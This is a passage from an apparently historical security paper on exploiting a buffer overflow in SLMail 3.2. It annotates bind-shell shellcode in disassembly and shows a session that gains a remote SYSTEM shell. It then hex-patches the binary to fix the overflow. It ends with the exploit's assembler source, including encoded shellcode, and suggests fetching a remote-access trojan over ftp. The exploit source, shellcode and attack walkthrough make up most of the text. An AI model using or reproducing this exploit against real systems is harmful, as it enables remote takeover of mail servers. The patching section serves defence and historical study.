+GMEM_FIXED+GMEM_ZEROINIT which will return a handle that we place in esi.
+
+
+:00000230 33C0                    xor eax, eax
+:00000232 8BC8                    mov ecx, eax
+:00000234 B504                    mov ch, 04
+:00000236 50                      push eax
+:00000237 50                      push eax
+:00000238 57                      push edi
+:00000239 51                      push ecx
+:0000023A 50                      push eax
+:0000023B FF77A8                  push [edi-58]
+:0000023E FF57D0                  call [edi-30]
+:00000241 833F01                  cmp dword ptr [edi], 00000001
+:00000244 7C22                    jl 00000268
+
+
+Now we start to get to the guts, this makes a call to PeekNamedPipe to see if
+we have any data in the read end of the pipe (StdOutput/StdError), if not we
+skip the following readfile/send functions as we are waiting on input from
+the user.  edi stores the number of bytes read, [edi-58] is the handle to the
+read end of the pipe.
+
+
+:00000246 33C0                    xor eax, eax
+:00000248 50                      push eax
+:00000249 57                      push edi
+:0000024A FF37                    push dword ptr [edi]
+:0000024C 56                      push esi
+:0000024D FF77A8                  push [edi-58]
+:00000250 FF57DC                  call [edi-24]
+:00000253 0BC0                    or eax, eax
+:00000255 742F                    je 00000286
+
+
+We call ReadFile and fill our created buffer with the data from the read-end
+of the pipe, we push the bytesread parameter from our earlier call to
+PeekNamedPipe.  If the function fails, i.e.: the command prompt was exited
+- then we jump to the end of our shellcode and call ExitProcess, which will
+kill the slmail process.
+
+:00000257 33C0                    xor eax, eax
+:00000259 50                      push eax
+:0000025A FF37                    push dword ptr [edi]
+:0000025C 56                      push esi
+:0000025D 53                      push ebx
+:0000025E FF57F8                  call [edi-08]
+
+Now we call send to fire the data from our buffer off to the connected user.
+
+
+:00000261 6A50                    push 00000050
+:00000263 FF57E0                  call [edi-20]
+:00000266 EBC8                    jmp 00000230
+
+
+Call Sleep and jump back to PeekNamedPipe.
+
+
+:00000268 33C0                    xor eax, eax
+:0000026A 50                      push eax
+:0000026B B404                    mov ah, 04
+:0000026D 50                      push eax
+:0000026E 56                      push esi
+:0000026F 53                      push ebx
+:00000270 FF57FC                  call [edi-04]
+
+
+This is the point we get to if there was no data in the read pipe, so we call
+recv and receive input from the user.
+
+
+:00000273 57                      push edi
+:00000274 33C9                    xor ecx, ecx
+:00000276 51                      push ecx
+:00000277 50                      push eax
+:00000278 56                      push esi
+:00000279 FF77AC                  push [edi-54]
+:0000027C FF57D8                  call [edi-28]
+
+
+We push the handle of the write end of our pipe (StdInput), and we call
+WriteFile sending the buffer from the user.  i.e.: we make it happen.
+
+
+:0000027F 6A50                    push 00000050
+:00000281 FF57E0                  call [edi-20]
+:00000284 EBAA                    jmp 00000230
+
+
+Call Sleep again and jump back to PeekNamedPipe.
+
+
+:00000286 50                      push eax
+:00000287 FF57E4                  call [edi-1C]
+:0000028A 90                      nop
+
+
+The shell has been exited so we call ExitProcess to clean up our mess.
+
+And there we have it, full control is at our fingertips.
+
+Before we enter the last section, on modifying the executable of our
+target, I'll give a quick example of the exploit in action.
+
+
+Ownership.
+~~~~~~~~~~
+
+E:\exploits>slxploit supermax.gen.nz 8376 1234
+SLMail (3.2.3113) remote.
+by Barnaby Jack AKA dark spyrit <dspyrit@beavuh.org>
+
+usage: slxploit <host> <port> <port to bind shell>
+e.g. - slxploit host.com 27 1234
+
+waiting for response....
+220 supermax.gen.nz Smtp Server SLMail v3.2 Ready ESMTP spoken here
+
+sent.. spawn connection now.
+
+
+Trying 192.168.10.3...
+Connected to supermax.gen.nz.
+Escape character is '^]'.
+Microsoft(R) Windows NT(TM)
+(C) Copyright 1985-1996 Microsoft Corp.
+
+E:\Program Files\SLmail\SYSTEM>
+E:\Program Files\SLmail\SYSTEM>at
+The service has not been started.
+
+E:\Program Files\SLmail\SYSTEM>net start schedule
+
+The Schedule service is starting.
+The Schedule service was started successfully.
+
+E:\Program Files\SLmail\SYSTEM>time
+The current time is: 23:49:36.36
+Enter the new time:
+
+E:\Program Files\SLmail\SYSTEM>at 23:51:00 net start slmail
+Added a new job with job ID = 0
+
+E:\Program Files\SLmail\SYSTEM>net view
+Server Name            Remark
+
+-------------------------------------------------------------------------------
+\\SUPERMAX
+The command completed successfully.
+
+E:\Program Files\SLmail\SYSTEM>net send supermax beavuh 99.
+The message was successfully sent to SUPERMAX.
+
+
+E:\Program Files\SLmail\SYSTEM>exit
+exit
+Connection closed by foreign host.
+
+Plenty of options, you could also create a file with ftp commands, to
+download bo2k for example, and use NT's console ftp.
+e.g. ftp -s:file host.
+
+
+Section 3: The Remedy.
+~~~~~~~~~~~~~~~~~~~~~~
+
+This is perhaps the most important section of the paper, and is not just
+useful for preventing vulnerabilities - the ability to add your own code
+leaves open an endless amount of possibilities as you can imagine.
+
+I advise that you have a look at some documentation on the PE file format,
+Matt Peitreks book "Windows 95 System Programming Secrets" has an excellent
+section, otherwise take a look at
+http://msdn.microsoft.com/library/specs/msdn_pecoff.htm for Microsoft's
+documentation.
+
+Consider this hypothetical situation for a minute:
+
+A huge hole is found rendering most NT servers on the internet vulnerable
+to remote system access.  Microsoft stumbles around for a week or so before
+releasing a suitable patch, while during this time some of the largest
+corporations have little to do but pray they won't fall victim to an attack,
+or make the change to alternative software.  Hey, that happened a couple of
+months ago! :)  But there is an alternative, patch the software yourself.
+
+There are 3 main approaches we can take to add our own code.
+
+1, Add our code to unused space in a section.
+2, Increase the size of the last section.
+3, Add a new section.
+
+The first is the technique we will use, to see an example of the second
+approach have a look at my trojan netstat which will be available at
+http://www.rootkit.com in the near future.
+
+Adding your own section - at least as far as what we are doing, won't
+normally be needed, so I won't cover the techniques in this document.
+
+Now we need to think about the code we will add, here's a few options:
+
+Add our own string length routine, and print out an error message
+depending on the length.. then skip the nasty functions.
+
+Add our own string length routine, and place a null at the beginning of
+the buffer depending on the length, so effectively the program thinks
+there was no input and will return a standard 'syntax error' message.
+
+Replace the offending strcpy function with a bounds checking version - i.e.:
+do what they should have done in the first place.
+
+I think it's obvious the approach we will take, the first option would be
+too involved, the second just isn't delicate - so we'll go with the last.
+
+It just so happens that in this case lstrcpynA is in our targets import
+table (if this wasn't the case? we would use the same techniques as shown
+in the shellcode - using the LoadLibrary and GetProcAddress procedures).
+
+Grab PE Dump or dumpbin, whatever you have on you.. and dump the section
+table for slmail.exe, if you haven't worked with the PE header before I'll
+explain a little as we go.
+
+
+Section Table
+  01 .text     VirtSize: 0003F99B  VirtAddr:  00001000
+    raw data offs:   00001000  raw data size: 00040000
+    relocation offs: 00000000  relocations:   00000000
+    line # offs:     00000000  line #'s:      00000000
+    characteristics: 60000020
+      CODE  MEM_EXECUTE  MEM_READ
+
+
+The section we will be working with is the .text section - where the code
+is located.  We can see here that the Virtual Size (the actual size of the
+code) is somewhat smaller than the raw data size (the amount of space that is
+actually taken up).  So if we subtract the Virtual Size from the raw data
+size :
+
+0x40000 - 0x3f99b = 0x665
+
+That gives us about 1.6k to play with, easily enough space for what we want to
+do.
+
+Why do we have this extra space? 
+
+Because compilers usually round up the size to align the section, which is
+handy for us :)
+
+Fire up your hex editor, and jump to the address 0x4099b (virtual size +
+raw data offset) and you'll notice we have a ton of null bytes, about 1.6k
+worth in fact.  This is a perfect place to dump our code - but before we do..
+
+We need to increase the Virtual Size to allow for our code, we may as well
+increase it to the largest available size, it won't hurt.  We also need to
+modify the flags, as you saw from the dump the .text section is defined code,
+readable and executable.
+
+The values are as follows:
+
+
+IMAGE_SCN_CNT_CODE	equ       000000020h  
+IMAGE_SCN_MEM_EXECUTE	equ       020000000h  
+IMAGE_SCN_MEM_READ      equ       040000000h 
+
+
+To get the final value we OR each of the flags, which results in 060000020h.
+
+But, if we wish to write data to our code space, to avoid page faults we also
+need to make the section writeable - we may not have the need, but it doesn't
+hurt to change the flags anyway.
+
+
+IMAGE_SCN_MEM_WRITE     equ       080000000h
+
+
+So we OR this value with 060000020h and we get 0E0000020h.  This is the new
+value we will add to the exe.
+ 
+Jump back into the hex editor and we'll make these changes permanent, to find
+the Virtual Size value for the .text section, simply do a search for .text
+and the following value is the culprit.
+
+
+000001D0  00 00 00 00 00 00 00 00-2E 74 65 78 74 00 00 00   .........text...
+000001E0  9B F9 03 00  <====                                ....
+
+
+To set this to the maximum allowed value we just replace with the raw data
+size:
+
+
+000001E0  00 00 04 00 
+
+
+And, we also make the change to the flags.
+
+
+000001D0  00 00 00 00 00 00 00 00-2E 74 65 78 74 00 00 00   .........text...
+000001E0  9B F9 03 00 00 10 00 00-00 00 04 00 00 10 00 00   ................
+000001F0  00 00 00 00 00 00 00 00-00 00 00 00 20 00 00 60   <=====
+
+
+We replace with our new value that allows us to write to the code space:
+
+
+000001F0  00 00 00 00 00 00 00 00-00 00 00 00 20 00 00 E0
+
+
+We'll quickly verify our changes with PE Dump, then we can actually get to
+what we're here for, getting our code executing.
+
+
+Section Table
+  01 .text     VirtSize: 00040000  VirtAddr:  00001000
+    raw data offs:   00001000  raw data size: 00040000
+    relocation offs: 00000000  relocations:   00000000
+    line # offs:     00000000  line #'s:      00000000
+    characteristics: E0000020
+      CODE  MEM_EXECUTE  MEM_READ  MEM_WRITE
+
+
+And there we have it, our virtual size equals the raw data size, and we now
+also have the writeable flag.
+
+What we need to do now, is find a location to jump to our own code. 
+
+
+004364AE                 push    edi
+004364AF                 push    eax ; we jump here.
+004364B0                 push    esi
+004364B1                 call    ds:lstrcpyA
+
+
+We'll get rid of the strcpy call, and make a jump to our code at the 'push
+eax'.  We know our code resides at RVA (relative virtual address) 0x4099b
+so we make our jump.  We can assemble our jumps in tasm:
+
+jmp $+(04099bh-0364afh)
+
+(RVA of our code - RVA of current location)
+
+Or, we can do it straight from the debugger.
+
+
+Let's make it perm.. the code follows:
+
+
+:004364AA 8B742478                mov esi, dword ptr [esp+78]
+:004364AE 57                      push edi
+:004364AF E9E7A40000              jmp 0044099B     ;jump to our code
+
+* Referenced by a (U)nconditional or (C)onditional Jump at Address:
+|:004409A9(U)
+|
+:004364B4 59                      pop ecx          ;restore ecx on return
+:004364B5 90                      nop
+:004364B6 90                      nop
+
+
+* Referenced by a (U)nconditional or (C)onditional Jump at Address:
+|:004364AF(U)
+|
+:0044099B 51                      push ecx          ;preserve ecx
+:0044099C 52                      push edx          ;preserve edx
+:0044099D E800000000              call 004409A2
+
+* Referenced by a CALL at Address:
+|:0044099D   
+|
+:004409A2 5A                      pop edx           ;get eip
+:004409A3 81EAA2090400            sub edx, 000409A2 ;get image base
+:004409A9 81C264110400            add edx, 00041164 ;point to strcpyn
+:004409AF 33C9                    xor ecx, ecx
+:004409B1 B160                    mov cl, 60        ;allow 96 bytes 
+:004409B3 51                      push ecx
+:004409B4 50                      push eax          ;our input
+:004409B5 56                      push esi          ;buffer 
+:004409B6 FF12                    call dword ptr [edx]  ;call strcpyn 
+:004409B8 5A                      pop edx             ;restore edx
+:004409B9 E9F65AFFFF              jmp 004364B4        ;back to proggie.
+
+Yeah, I know, W32Dasm - but hey, its fast and easy for showing code dumps
+:)
+
+The stack pointer is basically kept in tact, so we don't need to worry about
+screwing with it.
+
+Now, this should have solved our problem - let's check.
+
+220 supermax.gen.nz Smtp Server SLMail v3.2 Ready ESMTP spoken here
+expn <10 or so lines of x's>
+
+Connection closed by foreign host.
+
+Whoops, the slmail process dies.
+
+Guess what? there's another overflow.  This software is shocking, widely
+used shocking software might I add.  Well, let us fix this one also.
+
+A couple of rets, and we quickly find the offending code:
+
+
+00404bb1	mov	esi, eax
+00404bb3	push	edi	
+00404bb4	push	ecx	
+00404bb5	call	[KERNEL32!lstrcpy]
+
+
+edi contains our input, ecx the buffer.
+
+Here we go again.
+
+We'll put our code directly after our earlier modifications (0x409be), and
+we'll kill this strcpy call and jump to our code at 'push edi'.
+
+
+:00404BB1 8BF0                    mov esi, eax
+:00404BB3 E906BE0300              jmp 004409BE  ;jump to our code
+
+* Referenced by a (U)nconditional or (C)onditional Jump at Address:
+|:004409E0(U)
+|
+:00404BB8 90                      nop
+:00404BB9 90                      nop
+:00404BBA 90                      nop
+
+* Referenced by a (U)nconditional or (C)onditional Jump at Address:
+|:00404BB3(U)
+|
+:004409BE 90                      nop
+:004409BF 52                      push edx        ;preserve edx
+:004409C0 E800000000              call 004409C5
+
+* Referenced by a CALL at Address:
+|:004409C0   
+|
+:004409C5 5A                      pop edx	     ;get eip
+:004409C6 81EAC5090400            sub edx, 000409C5  ;get image base
+:004409CC 81C264110400            add edx, 00041164  ;address for strcpyn
+:004409D2 33C0                    xor eax, eax
+:004409D4 B060                    mov al, 60         ;allow 96 byes
+:004409D6 50                      push eax 
+:004409D7 57                      push edi           ;input
+:004409D8 51                      push ecx           ;buffer
+:004409D9 FF12                    call dword ptr [edx]  ;call strcpyn
+:004409DB 5A                      pop edx 		;restore edx
+:004409DC C6476000                mov [edi+60], 00	;cut the goddamn
+                                                        ;input short,
+                                                        ;incase there is 
+                                                        ;even more overflows 
+:004409E0 E9D341FCFF              jmp 00404BB8 ;return to the prog.
+
+
+This time...
+
+220 supermax.gen.nz Smtp Server SLMail v3.2 Ready ESMTP spoken here
+expn xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxx
+550 Unable to find list 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'.
+quit
+221 supermax.gen.nz Service Closing
+Connection closed by foreign host.
+
+
+And so it was done, 15 minutes work and we've fixed a terribly serious hole.
+
+No source? no problem.
+
+The binary for this quick patch will be available at http://www.beavuh.org, 
+although, a vendor patch is seriously recommended.
+
+This will prevent break-ins from the exploit that accompanies this paper,
+but there are far too many exploitable holes in this software - and no
+doubt after reading this other exploits are in the works.
+
+
+Conclusion.
+~~~~~~~~~~~
+
+Windows 9x/NT has a had a relatively easy ride as far as buffer overflows go -
+a change is coming.  Although some "big" software has been affected as of
+late, the limitations of the payload and the system dependency limited the
+wide-scale fear.
+
+It's time to recognize.
+
+The fact that I picked on 3rd party software for this article, rather than
+hitting the giant itself, is not because of lack of opportunities - trust
+me, there is a lot hiding behind the bloat.
+
+Navigate the code, work those registers, and you'll come up trumps -
+guaranteed.
+
+Fight those who try to outlaw our methods, support the open source
+movement, and support full disclosure - it is a good thing.
+
+
+"One future.  Two choices.  Oppose them or let them destroy us."
+
+-Propagandhi.
+
+
+Greets and thanks.
+~~~~~~~~~~~~~~~~~~
+
+neophyte, Greg Hoglund, c33, sacX, tree, casper, ripper, ryan, luny,
+sycotic, blitz, marc, Interrupt, ambient empire, DilDog, the beavuh &
+mulysa crew, the eEye team, the rootkit crew, attrition, w00w00, L0pht,
+ADM, Phrack, Security Focus, technotronic, HNN, Packet Storm Security.. 
+and everyone else I forgot.
+
+
+The Code.
+~~~~~~~~~
+
+The assembler source code follows, and the shellcode for the exploit in c
+format if anyone wishes to port.
+
+<++> P55/Win32-overflows/slxploit.asm !e7b4ebd0
+;-------(code)-------------------------------------------------------------
+
+; This is just a shell from an old exploit of mine, so the code is somewhat 
+; dodgy - and no real error checking.
+; Live with it.
+;
+; The binary is available at http://www.beavuh.org.
+;
+; To assemble:
+;
+; tasm32 -ml slxploit.asm
+; tlink32 -Tpe -c -x sxlploit.obj ,,, import32
+;
+; TASM 5 required!
+;
+; dark spyrit / barnaby jack <dspyrit@beavuh.org>
+
+
+.386p
+locals
+jumps
+.model flat, stdcall
+
+
+extrn GetCommandLineA:PROC
+extrn GetStdHandle:PROC
+extrn WriteConsoleA:PROC
+extrn ExitProcess:PROC
+extrn WSAStartup:PROC
+extrn connect:PROC
+extrn send:PROC
+extrn recv:PROC
+extrn WSACleanup:PROC
+extrn gethostbyname:PROC
+extrn htons:PROC
+extrn socket:PROC
+extrn inet_addr:PROC
+extrn closesocket:PROC
+
+.data
+sploit_length           equ     851
+
+sploit:
+ db 065h, 078h, 070h, 06eh, 020h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
+ db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
+ db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
+ db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
+ db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
+ db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
+ db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
+ db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
+ db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
+ db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
+ db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
+ db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
+ db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
+ db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
+ db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
+ db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
+ db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
+ db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
+ db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
+ db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
+ db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
+ db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
+ db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
+ db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
+ db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
+ db 090h, 090h, 0ebh, 007h, 090h, 0aah, 01ch, 09ch, 077h, 090h, 090h, 090h
+ db 033h, 0c0h, 050h, 0f7h, 0d0h, 050h, 059h, 0f2h, 0afh, 059h, 0b1h, 0c6h
+ db 08bh, 0c7h, 048h, 080h, 030h, 099h, 0e2h, 0fah, 033h, 0f6h, 096h, 0bbh
+ db 099h, 010h, 011h, 044h, 0c1h, 0ebh, 008h, 056h, 0ffh, 013h, 08bh, 0d0h
+ db 0fch, 033h, 0c9h, 0b1h, 00bh, 049h, 032h, 0c0h, 0ach, 084h, 0c0h, 075h
+ db 0f9h, 052h, 051h, 056h, 052h, 0b3h, 00ch, 0ffh, 013h, 0abh, 059h, 05ah
+ db 0e2h, 0ech, 032h, 0c0h, 0ach, 084h, 0c0h, 075h, 0f9h, 0b3h, 010h, 056h
+ db 0ffh, 013h, 08bh, 0d0h, 0fch, 033h, 0c9h, 0b1h, 006h, 032h, 0c0h, 0ach
+ db 084h, 0c0h, 075h, 0f9h, 052h, 051h, 056h, 052h, 0b3h, 00ch, 0ffh, 013h
+ db 0abh, 059h, 05ah, 0e2h, 0ech, 083h, 0c6h, 005h, 033h, 0c0h, 050h, 040h
+ db 050h, 040h, 050h, 0ffh, 057h, 0e8h, 093h, 06ah, 010h, 056h, 053h, 0ffh
+ db 057h, 0ech, 06ah, 002h, 053h, 0ffh, 057h, 0f0h, 033h, 0c0h, 057h, 050h
+ db 0b0h, 00ch, 0abh, 058h, 0abh, 040h, 0abh, 05fh, 048h, 050h, 057h, 056h
+ db 0adh, 056h, 0ffh, 057h, 0c0h, 048h, 050h, 057h, 0adh, 056h, 0adh, 056h
+ db 0ffh, 057h, 0c0h, 048h, 0b0h, 044h, 089h, 007h, 057h, 0ffh, 057h, 0c4h
+ db 033h, 0c0h, 08bh, 046h, 0f4h, 089h, 047h, 03ch, 089h, 047h, 040h, 08bh
+ db 006h, 089h, 047h, 038h, 033h, 0c0h, 066h, 0b8h, 001h, 001h, 089h, 047h
+ db 02ch, 057h, 057h, 033h, 0c0h, 050h, 050h, 050h, 040h, 050h, 048h, 050h
+ db 050h, 0adh, 056h, 033h, 0c0h, 050h, 0ffh, 057h, 0c8h, 0ffh, 076h, 0f0h
+ db 0ffh, 057h, 0cch, 0ffh, 076h, 0fch, 0ffh, 057h, 0cch, 048h, 050h, 050h
+ db 053h, 0ffh, 057h, 0f4h, 08bh, 0d8h, 033h, 0c0h, 0b4h, 004h, 050h, 0c1h
+ db 0e8h, 004h, 050h, 0ffh, 057h, 0d4h, 08bh, 0f0h, 033h, 0c0h, 08bh, 0c8h
+ db 0b5h, 004h, 050h, 050h, 057h, 051h, 050h, 0ffh, 077h, 0a8h, 0ffh, 057h
+ db 0d0h, 083h, 03fh, 001h, 07ch, 022h, 033h, 0c0h, 050h, 057h, 0ffh, 037h
+ db 056h, 0ffh, 077h, 0a8h, 0ffh, 057h, 0dch, 00bh, 0c0h, 074h, 02fh, 033h
+ db 0c0h, 050h, 0ffh, 037h, 056h, 053h, 0ffh, 057h, 0f8h, 06ah, 050h, 0ffh
+ db 057h, 0e0h, 0ebh, 0c8h, 033h, 0c0h, 050h, 0b4h, 004h, 050h, 056h, 053h
+ db 0ffh, 057h, 0fch, 057h, 033h, 0c9h, 051h, 050h, 056h, 0ffh, 077h, 0ach
+ db 0ffh, 057h, 0d8h, 06ah, 050h, 0ffh, 057h, 0e0h, 0ebh, 0aah, 050h, 0ffh
+ db 057h, 0e4h, 090h, 0d2h, 0dch, 0cbh, 0d7h, 0dch, 0d5h, 0aah, 0abh, 099h
+ db 0dah, 0ebh, 0fch, 0f8h, 0edh, 0fch, 0c9h, 0f0h, 0e9h, 0fch, 099h, 0deh
+ db 0fch, 0edh, 0cah, 0edh, 0f8h, 0ebh, 0edh, 0ech, 0e9h, 0d0h, 0f7h, 0ffh
+ db 0f6h, 0d8h, 099h, 0dah, 0ebh, 0fch, 0f8h, 0edh, 0fch, 0c9h, 0ebh, 0f6h
+ db 0fah, 0fch, 0eah, 0eah, 0d8h, 099h, 0dah, 0f5h, 0f6h, 0eah, 0fch, 0d1h
+ db 0f8h, 0f7h, 0fdh, 0f5h, 0fch, 099h, 0c9h, 0fch, 0fch, 0f2h, 0d7h, 0f8h
+ db 0f4h, 0fch, 0fdh, 0c9h, 0f0h, 0e9h, 0fch, 099h, 0deh, 0f5h, 0f6h, 0fbh
+ db 0f8h, 0f5h, 0d8h, 0f5h, 0f5h, 0f6h, 0fah, 099h, 0ceh, 0ebh, 0f0h, 0edh
+ db 0fch, 0dfh, 0f0h, 0f5h, 0fch, 099h, 0cbh, 0fch, 0f8h, 0fdh, 0dfh, 0f0h
+ db 0f5h, 0fch, 099h, 0cah, 0f5h, 0fch, 0fch, 0e9h, 099h, 0dch, 0e1h, 0f0h
+ db 0edh, 0c9h, 0ebh, 0f6h, 0fah, 0fch, 0eah, 0eah, 099h, 0ceh, 0cah, 0d6h
+ db 0dah, 0d2h, 0aah, 0abh, 099h, 0eah, 0f6h, 0fah, 0f2h, 0fch, 0edh, 099h
+ db 0fbh, 0f0h, 0f7h, 0fdh, 099h, 0f5h, 0f0h, 0eah, 0edh, 0fch, 0f7h, 099h
+ db 0f8h, 0fah, 0fah, 0fch, 0e9h, 0edh, 099h, 0eah, 0fch, 0f7h, 0fdh, 099h
+ db 0ebh, 0fch, 0fah, 0efh, 099h, 09bh, 099h 
+ store dw ? 
+ db 099h, 099h, 099h
+ db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 0fah, 0f4h, 0fdh
+ db 0b7h, 0fch, 0e1h, 0fch, 099h, 0ffh, 0ffh, 0ffh, 0ffh, 00dh, 00ah  
+
+logo  db "SLMail (3.2.3113) remote.", 13, 10
+      db "by dark spyrit aka Barnaby Jack <dspyrit@beavuh.org>",13,10,13,10
+      db "usage: slxploit <host> <port> <port to bind shell>", 13, 10
+      db "eg - slxploit host.com 27 1234",13,10,0
+      logolen equ $-logo
+
+
+errorinit db 10,"error initializing winsock.", 13, 10, 0
+errorinitl equ $-errorinit
+
+derror  db 10,"error.",13,10,0
+derrorl equ $-derror
+
+nohost db 10,"no host or ip specified.", 13,10,0
+nohostl equ $-nohost
+
+noport db 10,"no port specified.",13,10,0
+noportl equ $-noport
+
+no_port2 db 10,"no bind port specified.",13,10,0
+no_port2l equ $-no_port2
+
+response db 10,"waiting for response....",13,10,0
+respl   equ $-response
+
+reshost db 10,"error resolving host.",13,10,0
+reshostl equ $-reshost
+
+sockerr db 10,"error creating socket.",13,10,0
+sockerrl equ $-sockerr
+
+ipill   db 10,"ip error.",13,10,0
+ipilll   equ $-ipill
+
+cnerror db 10,"error establishing connection.",13,10,0
+cnerrorl equ $-cnerror
+
+success db 10,"sent.. spawn connection now.",13,10,0
+successl equ $-success
+
+console_in      dd      ?
+console_out     dd      ?
+bytes_read      dd      ?
+
+wsadescription_len equ 256
+wsasys_status_len equ 128
+
+WSAdata struct
+wVersion dw ?
+wHighVersion dw ?
+szDescription db wsadescription_len+1 dup (?)
+szSystemStatus db wsasys_status_len+1 dup (?)
+iMaxSockets dw ?
+iMaxUdpDg dw ?
+lpVendorInfo dw ?
+WSAdata ends
+
+sockaddr_in struct
+sin_family dw ?
+sin_port dw ?
+sin_addr dd ?
+sin_zero db 8 dup (0)
+sockaddr_in ends
+
+wsadata WSAdata <?>
+sin sockaddr_in <?>
+sock dd ?
+numbase dd 10
+_port db 256 dup (?)
+_host db 256 dup (?)
+_port2 db 256 dup (?)
+buffer db 1000 dup (0)
+
+.code
+start:
+
+	call    init_console
+	push    logolen
+	push    offset logo
+	call    write_console
+
+	call    GetCommandLineA
+	mov     edi, eax
+	mov     ecx, -1
+	xor     al, al
+	push    edi
+	repnz   scasb
+	not     ecx
+	pop     edi
+	mov     al, 20h
+	repnz   scasb
+	dec     ecx
+	cmp     ch, 0ffh
+	jz      @@0
+	test    ecx, ecx
+	jnz     @@1
+@@0:        
+	push    nohostl
+	push    offset nohost
+	call    write_console
+	jmp     quit3
+@@1:
+	mov     esi, edi
+	lea     edi, _host
+	call    parse
+	or      ecx, ecx
+	jnz     @@2
+	push    noportl
+	push    offset noport
+	call    write_console
+	jmp     quit3
+@@2:
+	lea     edi, _port
+	call    parse
+	or      ecx, ecx
+	jnz     @@3
+	push    no_port2l
+	push    offset no_port2
+	call    write_console
+	jmp     quit3
+
+@@3:
+	push    ecx
+	lea     edi, _port2
+	call    parse
+
+	push    offset wsadata
+	push    0101h
+	call    WSAStartup
+	or      eax, eax
+	jz      winsock_found
+
+	push    errorinitl
+	push    offset errorinit
+	call    write_console
+	jmp     quit3
+
+winsock_found:
+	xor     eax, eax
+	push    eax
+	inc     eax
+	push    eax
+	inc     eax
+	push    eax
+	call    socket
+	cmp     eax, -1
+	jnz     socket_ok
+
+	push    sockerrl
+	push    offset sockerr
+	call    write_console
+	jmp     quit2
+
+socket_ok:
+	mov     sock, eax
+	mov     sin.sin_family, 2
+	
+	mov     ebx, offset _port
+	call    str2num
+	mov     eax, edx
+	push    eax
+	call    htons
+	mov     sin.sin_port, ax
+	
+	mov     ebx, offset _port2
+	call    str2num
+	mov     eax, edx
+	push    eax
+	call    htons
+	xor     ax, 09999h
+	mov     store, ax
+
+	mov     esi, offset _host
+lewp:
+	xor     al, al
+	lodsb
+	cmp     al, 039h
+	ja      gethost
+	test    al, al
+	jnz     lewp
+	push    offset _host
+	call    inet_addr
+	cmp     eax, -1
+	jnz     ip_aight
+	push    ipilll
+	push    offset ipill
+	call    write_console
+	jmp     quit1
+
+ip_aight:
+	mov     sin.sin_addr, eax
+	jmp     continue
+
+gethost:
+	push    offset _host
+	call    gethostbyname
+	test    eax, eax
